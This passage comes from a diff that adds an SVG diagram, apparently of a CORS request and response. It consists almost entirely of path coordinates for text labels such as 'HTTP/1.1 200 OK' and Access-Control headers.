C274.175313,68.3112017 274.323749,69.1900991 274.323749,70.1953125 C274.323749,72.0963637 273.800317,73.5390576 272.753437,74.5234375 C271.706557,75.5078174 270.240426,76 268.354999,76 L264.964374,76 Z M277.497499,76 L277.497499,64.375 L283.974062,64.375 L283.934999,65.203125 L278.497499,65.203125 L278.497499,69.578125 L283.669374,69.578125 L283.669374,70.4296875 L278.497499,70.4296875 L278.497499,75.1640625 L284.106874,75.1640625 L284.020937,76 L277.497499,76 Z M287.249374,76 L287.249374,64.375 L288.257187,64.375 L288.257187,75.1171875 L293.483749,75.1171875 L293.436874,76 L287.249374,76 Z M295.876249,76 L295.876249,64.375 L302.352812,64.375 L302.313749,65.203125 L296.876249,65.203125 L296.876249,69.578125 L302.048124,69.578125 L302.048124,70.4296875 L296.876249,70.4296875 L296.876249,75.1640625 L302.485624,75.1640625 L302.399687,76 L295.876249,76 Z M307.924999,76 L307.924999,65.234375 L304.268749,65.234375 L304.268749,64.375 L312.596874,64.375 L312.596874,65.234375 L308.940624,65.234375 L308.940624,76 L307.924999,76 Z M314.911249,76 L314.911249,64.375 L321.387812,64.375 L321.348749,65.203125 L315.911249,65.203125 L315.911249,69.578125 L321.083124,69.578125 L321.083124,70.4296875 L315.911249,70.4296875 L315.911249,75.1640625 L321.520624,75.1640625 L321.434687,76 L314.911249,76 Z" id="Access-Control-Reque"></path>
+            </g>
+            <g id="Group-5" transform="translate(625.000000, 430.000000)" fill="#D3DDE2">
+                <path d="M237.696563,16 L237.696563,4.375 L238.696563,4.375 L238.696563,9.515625 L245.368438,9.515625 L245.368438,4.375 L246.368438,4.375 L246.368438,16 L245.368438,16 L245.368438,10.390625 L238.696563,10.390625 L238.696563,16 L237.696563,16 Z M252.339063,16 L252.339063,5.234375 L248.682813,5.234375 L248.682813,4.375 L257.010938,4.375 L257.010938,5.234375 L253.354688,5.234375 L253.354688,16 L252.339063,16 Z M261.622188,16 L261.622188,5.234375 L257.965938,5.234375 L257.965938,4.375 L266.294063,4.375 L266.294063,5.234375 L262.637813,5.234375 L262.637813,16 L261.622188,16 Z M268.608438,16 L268.608438,4.375 L272.163125,4.375 C272.663128,4.375 273.118852,4.42838488 273.530313,4.53515625 C273.941773,4.64192762 274.312863,4.80729055 274.643594,5.03125 C274.974325,5.25520945 275.230833,5.55859184 275.413125,5.94140625 C275.595418,6.32422066 275.686563,6.77083078 275.686563,7.28125 C275.686563,7.57812648 275.67224,7.8450509 275.643594,8.08203125 C275.614948,8.3190116 275.561563,8.56249875 275.483438,8.8125 C275.405312,9.06250125 275.299845,9.28124906 275.167031,9.46875 C275.034218,9.65625094 274.859741,9.83593664 274.643594,10.0078125 C274.427447,10.1796884 274.172241,10.320312 273.877969,10.4296875 C273.583697,10.539063 273.230836,10.6249997 272.819375,10.6875 C272.407915,10.7500003 271.944378,10.78125 271.42875,10.78125 C270.876664,10.78125 270.272503,10.7473962 269.61625,10.6796875 L269.61625,16 L268.608438,16 Z M271.530313,9.9140625 C272.134482,9.9140625 272.647498,9.85416727 273.069375,9.734375 C273.491252,9.61458273 273.806353,9.47916742 274.014688,9.328125 C274.223022,9.17708258 274.381875,8.96354305 274.49125,8.6875 C274.600626,8.41145695 274.661823,8.190105 274.674844,8.0234375 C274.687865,7.85677 274.694375,7.62239734 274.694375,7.3203125 L274.694375,7.2734375 C274.694375,6.59114242 274.462607,6.083335 273.999063,5.75 C273.535519,5.416665 272.936566,5.25 272.202188,5.25 L269.61625,5.25 L269.61625,9.8203125 C270.074586,9.88281281 270.7126,9.9140625 271.530313,9.9140625 Z M277.516563,17.359375 L282.993125,4.171875 L283.875938,4.171875 L278.391563,17.359375 L277.516563,17.359375 Z M287.549688,16 L287.549688,5.40625 C287.38302,5.52604227 287.1187,5.67447828 286.756719,5.8515625 C286.394738,6.02864672 286.034064,6.17968687 285.674688,6.3046875 L285.674688,5.4609375 C286.768443,4.95572664 287.453332,4.59375109 287.729375,4.375 L288.549688,4.375 L288.549688,16 L287.549688,16 Z M293.184375,16.0625 C292.908332,16.0625 292.700001,15.9817716 292.559375,15.8203125 C292.418749,15.6588534 292.348438,15.4687511 292.348438,15.25 C292.348438,15.0364573 292.418749,14.8489591 292.559375,14.6875 C292.700001,14.5260409 292.908332,14.4453125 293.184375,14.4453125 C293.470835,14.4453125 293.684374,14.5260409 293.825,14.6875 C293.965626,14.8489591 294.035938,15.0364573 294.035938,15.25 C294.035938,15.4687511 293.965626,15.6588534 293.825,15.8203125 C293.684374,15.9817716 293.470835,16.0625 293.184375,16.0625 Z M297.928438,16 L297.928438,5.40625 C297.76177,5.52604227 297.49745,5.67447828 297.135469,5.8515625 C296.773488,6.02864672 296.412814,6.17968687 296.053438,6.3046875 L296.053438,5.4609375 C297.147193,4.95572664 297.832082,4.59375109 298.108125,4.375 L298.928438,4.375 L298.928438,16 L297.928438,16 Z M311.223125,16 L310.98875,15.0078125 L315.043438,10.2890625 C315.57469,9.65885102 315.97052,9.11067941 316.230938,8.64453125 C316.491356,8.17838309 316.621563,7.72396055 316.621563,7.28125 C316.621563,6.54166297 316.447085,5.97526238 316.098125,5.58203125 C315.749165,5.18880012 315.228337,4.9921875 314.535625,4.9921875 C314.040831,4.9921875 313.555159,5.06640551 313.078594,5.21484375 C312.602029,5.36328199 312.21271,5.58072773 311.910625,5.8671875 L311.543438,5.109375 C312.194483,4.48437188 313.204889,4.171875 314.574688,4.171875 C315.569484,4.171875 316.354633,4.44530977 316.930156,4.9921875 C317.50568,5.53906523 317.793438,6.25780805 317.793438,7.1484375 C317.793438,7.74739883 317.641095,8.33723668 317.336406,8.91796875 C317.031717,9.49870082 316.53042,10.1927043 315.8325,11 L312.316875,15.0390625 L317.887188,15.0390625 L317.824688,16 L311.223125,16 Z M324.709375,15.2890625 C325.506254,15.2890625 326.149477,14.8112027 326.639063,13.8554688 C327.128648,12.8997348 327.373438,11.6145914 327.373438,10 C327.373438,8.41665875 327.128648,7.15495262 326.639063,6.21484375 C326.149477,5.27473488 325.508858,4.8046875 324.717188,4.8046875 C323.920309,4.8046875 323.277086,5.27603695 322.7875,6.21875 C322.297914,7.16146305 322.055729,8.42707539 322.060938,10.015625 C322.060938,11.6302164 322.304425,12.9127557 322.791406,13.8632812 C323.278388,14.8138068 323.917704,15.2890625 324.709375,15.2890625 Z M324.717188,16.1875 C324.060934,16.1875 323.482815,16.039064 322.982813,15.7421875 C322.48281,15.445311 322.077866,15.0221382 321.767969,14.4726562 C321.458071,13.9231743 321.226303,13.2786495 321.072656,12.5390625 C320.91901,11.7994755 320.842188,10.9661505 320.842188,10.0390625 C320.842188,8.08592773 321.174216,6.57552617 321.838281,5.5078125 C322.502347,4.44009883 323.461973,3.90625 324.717188,3.90625 C325.972402,3.90625 326.92682,4.43879676 327.580469,5.50390625 C328.234118,6.56901574 328.560938,8.08071938 328.560938,10.0390625 C328.560938,10.9661505 328.485418,11.7994755 328.334375,12.5390625 C328.183333,13.2786495 327.954168,13.9231743 327.646875,14.4726562 C327.339582,15.0221382 326.938544,15.445311 326.44375,15.7421875 C325.948956,16.039064 325.373441,16.1875 324.717188,16.1875 Z M335.039375,15.2890625 C335.836254,15.2890625 336.479477,14.8112027 336.969063,13.8554688 C337.458648,12.8997348 337.703438,11.6145914 337.703438,10 C337.703438,8.41665875 337.458648,7.15495262 336.969063,6.21484375 C336.479477,5.27473488 335.838858,4.8046875 335.047188,4.8046875 C334.250309,4.8046875 333.607086,5.27603695 333.1175,6.21875 C332.627914,7.16146305 332.385729,8.42707539 332.390938,10.015625 C332.390938,11.6302164 332.634425,12.9127557 333.121406,13.8632812 C333.608388,14.8138068 334.247704,15.2890625 335.039375,15.2890625 Z M335.047188,16.1875 C334.390934,16.1875 333.812815,16.039064 333.312813,15.7421875 C332.81281,15.445311 332.407866,15.0221382 332.097969,14.4726562 C331.788071,13.9231743 331.556303,13.2786495 331.402656,12.5390625 C331.24901,11.7994755 331.172188,10.9661505 331.172188,10.0390625 C331.172188,8.08592773 331.504215,6.57552617 332.168281,5.5078125 C332.832347,4.44009883 333.791973,3.90625 335.047188,3.90625 C336.302402,3.90625 337.25682,4.43879676 337.910469,5.50390625 C338.564118,6.56901574 338.890938,8.08071938 338.890938,10.0390625 C338.890938,10.9661505 338.815417,11.7994755 338.664375,12.5390625 C338.513333,13.2786495 338.284168,13.9231743 337.976875,14.4726562 C337.669582,15.0221382 337.268544,15.445311 336.77375,15.7421875 C336.278956,16.039064 335.703441,16.1875 335.047188,16.1875 Z M351.43375,15.359375 C352.392088,15.359375 353.19807,15.1406272 353.851719,14.703125 C354.505368,14.2656228 354.98453,13.6653684 355.289219,12.9023438 C355.593908,12.1393191 355.74625,11.2317761 355.74625,10.1796875 C355.74625,8.53384594 355.38167,7.26042117 354.6525,6.359375 C353.92333,5.45832883 352.853028,5.0078125 351.441563,5.0078125 C350.01968,5.0078125 348.93766,5.45702676 348.195469,6.35546875 C347.453278,7.25391074 347.082188,8.52863758 347.082188,10.1796875 C347.082188,11.7786538 347.450673,13.041662 348.187656,13.96875 C348.924639,14.895838 350.00666,15.359375 351.43375,15.359375 Z M351.43375,16.1796875 C350.548329,16.1796875 349.757972,16.0325536 349.062656,15.7382812 C348.36734,15.4440089 347.797034,15.0299506 347.351719,14.4960938 C346.906404,13.9622369 346.567866,13.3307328 346.336094,12.6015625 C346.104322,11.8723922 345.988438,11.0677127 345.988438,10.1875 C345.988438,8.34374078 346.463693,6.88021375 347.414219,5.796875 C348.364744,4.71353625 349.707179,4.171875 351.441563,4.171875 C353.144696,4.171875 354.472808,4.71744246 355.425938,5.80859375 C356.379067,6.89974504 356.855625,8.36197 356.855625,10.1953125 C356.855625,11.0546918 356.738439,11.8476526 356.504063,12.5742188 C356.269686,13.3007849 355.929846,13.932289 355.484531,14.46875 C355.039217,15.005211 354.470212,15.4244777 353.7775,15.7265625 C353.084788,16.0286473 352.303546,16.1796875 351.43375,16.1796875 Z M360.029375,16 L360.029375,4.375 L361.037188,4.375 L361.037188,10.3828125 C361.266355,10.1276029 361.568436,9.79297082 361.943438,9.37890625 C362.318439,8.96484168 362.903069,8.3190148 363.697344,7.44140625 C364.491619,6.5637977 365.151768,5.83333625 365.677813,5.25 L366.466875,4.375 L367.787188,4.375 L362.935625,9.6171875 L368.185625,16 L366.912188,16 L362.17,10.2265625 L361.037188,11.2890625 L361.037188,16 L360.029375,16 Z" id="HTTP/1.1-200-OK"></path>
+                <path d="M127.318751,46 L131.857813,34.375 L132.818751,34.375 L137.193751,46 L136.162501,46 L134.678126,42.0546875 L129.857813,42.0546875 L128.310938,46 L127.318751,46 Z M130.240626,41.3203125 L134.318751,41.3203125 C133.14687,37.9557123 132.482814,35.9765655 132.326563,35.3828125 C132.264063,35.6119803 132.058336,36.2213492 131.709376,37.2109375 C131.360415,38.2005258 131.027085,39.1328081 130.709376,40.0078125 L130.240626,41.3203125 Z M142.789375,46.1875 C141.961246,46.1875 141.242504,45.984377 140.633125,45.578125 C140.023747,45.171873 139.570627,44.6419304 139.27375,43.9882812 C138.976874,43.3346321 138.828438,42.6067748 138.828438,41.8046875 C138.828438,41.1901011 138.916979,40.6119819 139.094063,40.0703125 C139.271147,39.5286431 139.522447,39.0494812 139.847969,38.6328125 C140.173492,38.2161438 140.592758,37.88672 141.105782,37.6445312 C141.618805,37.4023425 142.190414,37.28125 142.820625,37.28125 C143.232086,37.28125 143.642238,37.335937 144.051094,37.4453125 C144.45995,37.554688 144.763333,37.6848951 144.96125,37.8359375 L144.656563,38.5625 C144.120102,38.2604152 143.484692,38.109375 142.750313,38.109375 C141.859684,38.109375 141.153961,38.4466112 140.633125,39.1210938 C140.11229,39.7955763 139.851875,40.6900986 139.851875,41.8046875 C139.851875,42.8724012 140.110987,43.7356738 140.629219,44.3945312 C141.147451,45.0533887 141.854475,45.3828125 142.750313,45.3828125 C143.375316,45.3828125 144.047184,45.2265641 144.765938,44.9140625 L144.914375,45.609375 C144.669583,45.7916676 144.351877,45.9335932 143.96125,46.0351562 C143.570624,46.1367193 143.180002,46.1875 142.789375,46.1875 Z M151.033438,46.1875 C150.205309,46.1875 149.486566,45.984377 148.877188,45.578125 C148.26781,45.171873 147.814689,44.6419304 147.517813,43.9882812 C147.220936,43.3346321 147.0725,42.6067748 147.0725,41.8046875 C147.0725,41.1901011 147.161041,40.6119819 147.338125,40.0703125 C147.51521,39.5286431 147.766509,39.0494812 148.092032,38.6328125 C148.417554,38.2161438 148.836821,37.88672 149.349844,37.6445312 C149.862868,37.4023425 150.434476,37.28125 151.064688,37.28125 C151.476148,37.28125 151.886301,37.335937 152.295157,37.4453125 C152.704013,37.554688 153.007395,37.6848951 153.205313,37.8359375 L152.900625,38.5625 C152.364164,38.2604152 151.728754,38.109375 150.994375,38.109375 C150.103746,38.109375 149.398024,38.4466112 148.877188,39.1210938 C148.356352,39.7955763 148.095938,40.6900986 148.095938,41.8046875 C148.095938,42.8724012 148.35505,43.7356738 148.873282,44.3945312 C149.391513,45.0533887 150.098538,45.3828125 150.994375,45.3828125 C151.619379,45.3828125 152.291247,45.2265641 153.01,44.9140625 L153.158438,45.609375 C152.913645,45.7916676 152.59594,45.9335932 152.205313,46.0351562 C151.814686,46.1367193 151.424065,46.1875 151.033438,46.1875 Z M159.269688,46.1875 C158.08739,46.1875 157.148598,45.7916706 156.453282,45 C155.757966,44.2083294 155.410313,43.1354234 155.410313,41.78125 C155.410313,40.4739518 155.750153,39.40365 156.429844,38.5703125 C157.109535,37.736975 157.988433,37.3072918 159.066563,37.28125 C160.071776,37.28125 160.87906,37.6406214 161.488438,38.359375 C162.097816,39.0781286 162.4025,40.0416606 162.4025,41.25 C162.4025,41.2968752 162.401198,41.3919264 162.398594,41.5351562 C162.39599,41.6783861 162.394688,41.7786455 162.394688,41.8359375 L156.43375,41.8359375 C156.444167,42.9349013 156.70979,43.8059864 157.230625,44.4492188 C157.751461,45.0924511 158.438955,45.4140625 159.293125,45.4140625 C159.85042,45.4140625 160.33479,45.348959 160.74625,45.21875 C161.157711,45.088541 161.587394,44.903647 162.035313,44.6640625 L162.199375,45.390625 C161.334788,45.9218777 160.358235,46.1875 159.269688,46.1875 Z M156.472813,41.0546875 L161.347813,41.0546875 C161.347813,40.1015577 161.142086,39.3710963 160.730625,38.8632812 C160.319165,38.3554662 159.754067,38.1015625 159.035313,38.1015625 C158.306143,38.1015625 157.717607,38.3723931 157.269688,38.9140625 C156.821769,39.4557319 156.556147,40.1692664 156.472813,41.0546875 Z M167.67,46.1953125 C167.117914,46.1953125 166.59969,46.1276048 166.115313,45.9921875 C165.630936,45.8567702 165.248127,45.6953134 164.966875,45.5078125 L165.1075,44.6953125 C165.96688,45.1432314 166.789788,45.3671875 167.57625,45.3671875 C168.987716,45.3671875 169.719479,44.8437552 169.771563,43.796875 C169.771563,43.3593728 169.629637,43.0156262 169.345782,42.765625 C169.061926,42.5156238 168.492921,42.2552097 167.63875,41.984375 C167.190832,41.8281242 166.943438,41.7421876 166.896563,41.7265625 C165.558015,41.3203105 164.883542,40.5989635 164.873125,39.5625 C164.873125,38.9635387 165.137446,38.4335961 165.666094,37.9726562 C166.194743,37.5117164 166.909579,37.28125 167.810625,37.28125 C168.711672,37.28125 169.558017,37.4583316 170.349688,37.8125 L170.021563,38.53125 C169.219476,38.2291652 168.474691,38.078125 167.787188,38.078125 C167.183018,38.078125 166.707763,38.2135403 166.361407,38.484375 C166.015051,38.7552097 165.841875,39.1197894 165.841875,39.578125 C165.841875,39.9635436 165.955156,40.2591136 166.181719,40.4648438 C166.408283,40.6705739 166.857497,40.8671866 167.529375,41.0546875 C167.602292,41.0755209 167.736406,41.1223955 167.931719,41.1953125 C168.127033,41.2682295 168.235104,41.3072916 168.255938,41.3125 C169.156984,41.588543 169.785884,41.9153627 170.142657,42.2929688 C170.499429,42.6705748 170.677813,43.1848926 170.677813,43.8359375 C170.662188,44.5859413 170.382243,45.1666646 169.837969,45.578125 C169.293696,45.9895854 168.571047,46.1953125 167.67,46.1953125 Z M175.875,46.1953125 C175.322914,46.1953125 174.80469,46.1276048 174.320313,45.9921875 C173.835935,45.8567702 173.453127,45.6953134 173.171875,45.5078125 L173.3125,44.6953125 C174.17188,45.1432314 174.994788,45.3671875 175.78125,45.3671875 C177.192716,45.3671875 177.924479,44.8437552 177.976563,43.796875 C177.976563,43.3593728 177.834637,43.0156262 177.550782,42.765625 C177.266926,42.5156238 176.697921,42.2552097 175.84375,41.984375 C175.395832,41.8281242 175.148438,41.7421876 175.101563,41.7265625 C173.763015,41.3203105 173.088542,40.5989635 173.078125,39.5625 C173.078125,38.9635387 173.342446,38.4335961 173.871094,37.9726562 C174.399743,37.5117164 175.114579,37.28125 176.015625,37.28125 C176.916672,37.28125 177.763017,37.4583316 178.554688,37.8125 L178.226563,38.53125 C177.424476,38.2291652 176.679691,38.078125 175.992188,38.078125 C175.388018,38.078125 174.912763,38.2135403 174.566407,38.484375 C174.220051,38.7552097 174.046875,39.1197894 174.046875,39.578125 C174.046875,39.9635436 174.160156,40.2591136 174.386719,40.4648438 C174.613283,40.6705739 175.062497,40.8671866 175.734375,41.0546875 C175.807292,41.0755209 175.941406,41.1223955 176.136719,41.1953125 C176.332033,41.2682295 176.440104,41.3072916 176.460938,41.3125 C177.361984,41.588543 177.990884,41.9153627 178.347657,42.2929688 C178.704429,42.6705748 178.882813,43.1848926 178.882813,43.8359375 C178.867188,44.5859413 178.587243,45.1666646 178.042969,45.578125 C177.498696,45.9895854 176.776047,46.1953125 175.875,46.1953125 Z M181.158125,41.8515625 L181.158125,40.9921875 L184.939375,40.9921875 L184.939375,41.8515625 L181.158125,41.8515625 Z M192.8475,46.1796875 C191.956871,46.1796875 191.162608,46.0273453 190.464688,45.7226562 C189.766768,45.4179672 189.197763,44.9947944 188.757657,44.453125 C188.31755,43.9114556 187.98422,43.2760453 187.757657,42.546875 C187.531093,41.8177047 187.417813,41.0182335 187.417813,40.1484375 C187.417813,38.9921817 187.63005,37.9674524 188.054532,37.0742188 C188.479013,36.1809851 189.113121,35.4739609 189.956875,34.953125 C190.80063,34.4322891 191.798015,34.171875 192.949063,34.171875 C194.214694,34.171875 195.292808,34.4374973 196.183438,34.96875 L195.706875,35.7421875 C194.894371,35.2526017 193.977714,35.0078125 192.956875,35.0078125 C192.24333,35.0078125 191.602712,35.1419257 191.035,35.4101562 C190.467289,35.6783868 190.00245,36.0494768 189.640469,36.5234375 C189.278488,36.9973982 189.002449,37.5468719 188.812344,38.171875 C188.622239,38.7968781 188.527188,39.4739547 188.527188,40.203125 C188.527188,40.9166702 188.614427,41.5768199 188.788907,42.1835938 C188.963387,42.7903676 189.226405,43.3320289 189.577969,43.8085938 C189.929533,44.2851586 190.396977,44.6601549 190.980313,44.9335938 C191.563649,45.2070326 192.235517,45.34375 192.995938,45.34375 C193.81365,45.34375 194.7251,45.1171898 195.730313,44.6640625 L195.933438,45.46875 C195.173017,45.9427107 194.144382,46.1796875 192.8475,46.1796875 Z M202.068125,45.4140625 C202.693128,45.4140625 203.220467,45.2486996 203.650157,44.9179688 C204.079846,44.5872379 204.392343,44.1510444 204.587657,43.609375 C204.78297,43.0677056 204.880625,42.445316 204.880625,41.7421875 C204.880625,40.6380153 204.646253,39.7500034 204.1775,39.078125 C203.708748,38.4062466 202.995213,38.0703125 202.036875,38.0703125 C201.411872,38.0703125 200.879325,38.2382796 200.439219,38.5742188 C199.999113,38.9101579 199.677501,39.3502577 199.474375,39.8945312 C199.271249,40.4388048 199.169688,41.0624965 199.169688,41.765625 C199.169688,42.8333387 199.418383,43.7083299 199.915782,44.390625 C200.41318,45.0729201 201.130621,45.4140625 202.068125,45.4140625 Z M201.997813,46.1875 C201.221767,46.1875 200.53818,45.9921895 199.947032,45.6015625 C199.355883,45.2109355 198.905366,44.6809929 198.595469,44.0117188 C198.285572,43.3424446 198.130625,42.5859417 198.130625,41.7421875 C198.130625,41.1067677 198.220468,40.5169298 198.400157,39.9726562 C198.579845,39.4283827 198.836353,38.9570332 199.169688,38.5585938 C199.503023,38.1601543 199.917081,37.8476574 200.411875,37.6210938 C200.90667,37.3945301 201.456143,37.28125 202.060313,37.28125 C202.8624,37.28125 203.557706,37.4778626 204.14625,37.8710938 C204.734795,38.2643249 205.176197,38.7929654 205.470469,39.4570312 C205.764741,40.1210971 205.911875,40.8775999 205.911875,41.7265625 C205.911875,42.5807334 205.760835,43.3411425 205.45875,44.0078125 C205.156666,44.6744825 204.706149,45.2044251 204.107188,45.5976562 C203.508227,45.9908874 202.805109,46.1875 201.997813,46.1875 Z M208.648125,46 L208.648125,37.4375 L209.491875,37.4375 L209.624688,38.7578125 C209.931981,38.2994769 210.344737,37.9388034 210.862969,37.6757812 C211.381201,37.4127591 211.939789,37.28125 212.53875,37.28125 C213.52313,37.28125 214.247081,37.5520806 214.710625,38.09375 C215.174169,38.6354194 215.405938,39.4999941 215.405938,40.6875 L215.405938,46 L214.429375,46 L214.429375,40.25 C214.403334,39.4895795 214.241877,38.94271 213.945,38.609375 C213.648124,38.27604 213.16115,38.109375 212.484063,38.109375 C211.708017,38.109375 211.073909,38.3046855 210.581719,38.6953125 C210.089529,39.0859395 209.780938,39.5911427 209.655938,40.2109375 C209.635104,40.4557304 209.624688,40.7109362 209.624688,40.9765625 L209.624688,46 L208.648125,46 Z M220.892188,46.1796875 C220.173434,46.1796875 219.647398,46.0169287 219.314063,45.6914062 C218.980728,45.3658838 218.814063,44.8359412 218.814063,44.1015625 L218.814063,38.1484375 L217.603125,38.1484375 L217.673438,37.5625 L218.829688,37.453125 L219.0875,35.4921875 L219.767188,35.4453125 L219.767188,37.4375 L222.267188,37.4375 L222.267188,38.1484375 L219.767188,38.1484375 L219.767188,43.8984375 C219.767188,44.5026072 219.866145,44.9075511 220.064063,45.1132812 C220.26198,45.3190114 220.610935,45.421875 221.110938,45.421875 C221.433856,45.421875 221.834894,45.3619798 222.314063,45.2421875 L222.353125,45.9921875 C221.722914,46.1171881 221.23594,46.1796875 220.892188,46.1796875 Z M224.605,46 C224.594584,40.9739332 224.589375,38.1197951 224.589375,37.4375 L225.38625,37.4375 L225.44875,39.125 C225.756044,38.6145808 226.146665,38.1979183 226.620625,37.875 C227.094586,37.5520817 227.589373,37.390625 228.105,37.390625 C228.318543,37.390625 228.547707,37.408854 228.7925,37.4453125 L228.722188,38.25 C228.534687,38.2187498 228.336772,38.203125 228.128438,38.203125 C227.404476,38.203125 226.796409,38.4882784 226.304219,39.0585938 C225.812029,39.6289091 225.565938,40.3046836 225.565938,41.0859375 L225.565938,46 L224.605,46 Z M234.40375,45.4140625 C235.028753,45.4140625 235.556092,45.2486996 235.985782,44.9179688 C236.415471,44.5872379 236.727968,44.1510444 236.923282,43.609375 C237.118595,43.0677056 237.21625,42.445316 237.21625,41.7421875 C237.21625,40.6380153 236.981878,39.7500034 236.513125,39.078125 C236.044373,38.4062466 235.330838,38.0703125 234.3725,38.0703125 C233.747497,38.0703125 233.21495,38.2382796 232.774844,38.5742188 C232.334738,38.9101579 232.013126,39.3502577 231.81,39.8945312 C231.606874,40.4388048 231.505313,41.0624965 231.505313,41.765625 C231.505313,42.8333387 231.754008,43.7083299 232.251407,44.390625 C232.748805,45.0729201 233.466246,45.4140625 234.40375,45.4140625 Z M234.333438,46.1875 C233.557392,46.1875 232.873805,45.9921895 232.282657,45.6015625 C231.691508,45.2109355 231.240991,44.6809929 230.931094,44.0117188 C230.621197,43.3424446 230.46625,42.5859417 230.46625,41.7421875 C230.46625,41.1067677 230.556093,40.5169298 230.735782,39.9726562 C230.91547,39.4283827 231.171978,38.9570332 231.505313,38.5585938 C231.838648,38.1601543 232.252706,37.8476574 232.7475,37.6210938 C233.242294,37.3945301 233.791768,37.28125 234.395938,37.28125 C235.198025,37.28125 235.893331,37.4778626 236.481875,37.8710938 C237.07042,38.2643249 237.511822,38.7929654 237.806094,39.4570312 C238.100366,40.1210971 238.2475,40.8775999 238.2475,41.7265625 C238.2475,42.5807334 238.09646,43.3411425 237.794375,44.0078125 C237.49229,44.6744825 237.041774,45.2044251 236.442813,45.5976562 C235.843851,45.9908874 235.140734,46.1875 234.333438,46.1875 Z M243.14,46.1796875 C242.421247,46.1796875 241.89521,46.0169287 241.561875,45.6914062 C241.22854,45.3658838 241.061875,44.8359412 241.061875,44.1015625 L241.061875,34.109375 L242.015,34.03125 L242.015,44.046875 C242.015,44.5677109 242.110051,44.9270823 242.300157,45.125 C242.490262,45.3229177 242.778019,45.421875 243.163438,45.421875 C243.475939,45.421875 243.86656,45.3619798 244.335313,45.2421875 L244.374375,45.9921875 C243.863956,46.1171881 243.452502,46.1796875 243.14,46.1796875 Z M245.930938,41.8515625 L245.930938,40.9921875 L249.712188,40.9921875 L249.712188,41.8515625 L245.930938,41.8515625 Z M251.315625,46 L255.854688,34.375 L256.815625,34.375 L261.190625,46 L260.159375,46 L258.675,42.0546875 L253.854688,42.0546875 L252.307813,46 L251.315625,46 Z M254.2375,41.3203125 L258.315625,41.3203125 C257.143744,37.9557123 256.479689,35.9765655 256.323438,35.3828125 C256.260937,35.6119803 256.05521,36.2213492 255.70625,37.2109375 C255.35729,38.2005258 255.02396,39.1328081 254.70625,40.0078125 L254.2375,41.3203125 Z M265.372188,46.1796875 C264.653434,46.1796875 264.127398,46.0169287 263.794063,45.6914062 C263.460728,45.3658838 263.294063,44.8359412 263.294063,44.1015625 L263.294063,34.109375 L264.247188,34.03125 L264.247188,44.046875 C264.247188,44.5677109 264.342239,44.9270823 264.532344,45.125 C264.722449,45.3229177 265.010207,45.421875 265.395625,45.421875 C265.708127,45.421875 266.098748,45.3619798 266.5675,45.2421875 L266.606563,45.9921875 C266.096144,46.1171881 265.684689,46.1796875 265.372188,46.1796875 Z M270.74125,46.1796875 C270.022497,46.1796875 269.49646,46.0169287 269.163125,45.6914062 C268.82979,45.3658838 268.663125,44.8359412 268.663125,44.1015625 L268.663125,34.109375 L269.61625,34.03125 L269.61625,44.046875 C269.61625,44.5677109 269.711301,44.9270823 269.901406,45.125 C270.091512,45.3229177 270.379269,45.421875 270.764688,45.421875 C271.077189,45.421875 271.46781,45.3619798 271.936563,45.2421875 L271.975625,45.9921875 C271.465206,46.1171881 271.053752,46.1796875 270.74125,46.1796875 Z M277.500938,45.4140625 C278.125941,45.4140625 278.653279,45.2486996 279.082969,44.9179688 C279.512659,44.5872379 279.825155,44.1510444 280.020469,43.609375 C280.215782,43.0677056 280.313438,42.445316 280.313438,41.7421875 C280.313438,40.6380153 280.079065,39.7500034 279.610313,39.078125 C279.14156,38.4062466 278.428026,38.0703125 277.469688,38.0703125 C276.844685,38.0703125 276.312138,38.2382796 275.872031,38.5742188 C275.431925,38.9101579 275.110314,39.3502577 274.907188,39.8945312 C274.704062,40.4388048 274.6025,41.0624965 274.6025,41.765625 C274.6025,42.8333387 274.851196,43.7083299 275.348594,44.390625 C275.845992,45.0729201 276.563433,45.4140625 277.500938,45.4140625 Z M277.430625,46.1875 C276.65458,46.1875 275.970993,45.9921895 275.379844,45.6015625 C274.788695,45.2109355 274.338179,44.6809929 274.028281,44.0117188 C273.718384,43.3424446 273.563438,42.5859417 273.563438,41.7421875 C273.563438,41.1067677 273.653281,40.5169298 273.832969,39.9726562 C274.012657,39.4283827 274.269165,38.9570332 274.6025,38.5585938 C274.935835,38.1601543 275.349894,37.8476574 275.844688,37.6210938 C276.339482,37.3945301 276.888956,37.28125 277.493125,37.28125 C278.295213,37.28125 278.990518,37.4778626 279.579063,37.8710938 C280.167607,38.2643249 280.609009,38.7929654 280.903281,39.4570312 C281.197554,40.1210971 281.344688,40.8775999 281.344688,41.7265625 C281.344688,42.5807334 281.193648,43.3411425 280.891563,44.0078125 C280.589478,44.6744825 280.138962,45.2044251 279.54,45.5976562 C278.941039,45.9908874 278.237921,46.1875 277.430625,46.1875 Z M285.377813,46 L282.987188,37.4375 L284.002813,37.4375 L285.979375,45.0859375 C287.401257,40.512998 288.19552,37.9635443 288.362188,37.4375 L289.549688,37.4375 C291.106987,42.5208588 291.893438,45.0625 291.909063,45.0625 L293.799688,37.4375 L294.8075,37.4375 L292.455938,46 L291.330938,46 C291.315313,46.0052084 290.948129,44.8046995 290.229375,42.3984375 C289.510622,39.9921755 289.093959,38.5781271 288.979375,38.15625 C288.916875,38.4375014 288.679898,39.2304622 288.268438,40.5351562 C287.856977,41.8398503 287.461148,43.0781191 287.080938,44.25 C286.700727,45.4218809 286.508021,46.0052084 286.502813,46 L285.377813,46 Z M296.535938,41.8515625 L296.535938,40.9921875 L300.317188,40.9921875 L300.317188,41.8515625 L296.535938,41.8515625 Z M308.240938,45.359375 C309.199276,45.359375 310.005257,45.1406272 310.658906,44.703125 C311.312556,44.2656228 311.791717,43.6653684 312.096406,42.9023438 C312.401095,42.1393191 312.553438,41.2317761 312.553438,40.1796875 C312.553438,38.5338459 312.188858,37.2604212 311.459688,36.359375 C310.730517,35.4583288 309.660216,35.0078125 308.24875,35.0078125 C306.826868,35.0078125 305.744848,35.4570268 305.002656,36.3554688 C304.260465,37.2539107 303.889375,38.5286376 303.889375,40.1796875 C303.889375,41.7786538 304.257861,43.041662 304.994844,43.96875 C305.731827,44.895838 306.813847,45.359375 308.240938,45.359375 Z M308.240938,46.1796875 C307.355517,46.1796875 306.56516,46.0325536 305.869844,45.7382812 C305.174528,45.4440089 304.604221,45.0299506 304.158906,44.4960938 C303.713592,43.9622369 303.375053,43.3307328 303.143281,42.6015625 C302.911509,41.8723922 302.795625,41.0677127 302.795625,40.1875 C302.795625,38.3437408 303.270881,36.8802137 304.221406,35.796875 C305.171932,34.7135363 306.514366,34.171875 308.24875,34.171875 C309.951884,34.171875 311.279995,34.7174425 312.233125,35.8085938 C313.186255,36.899745 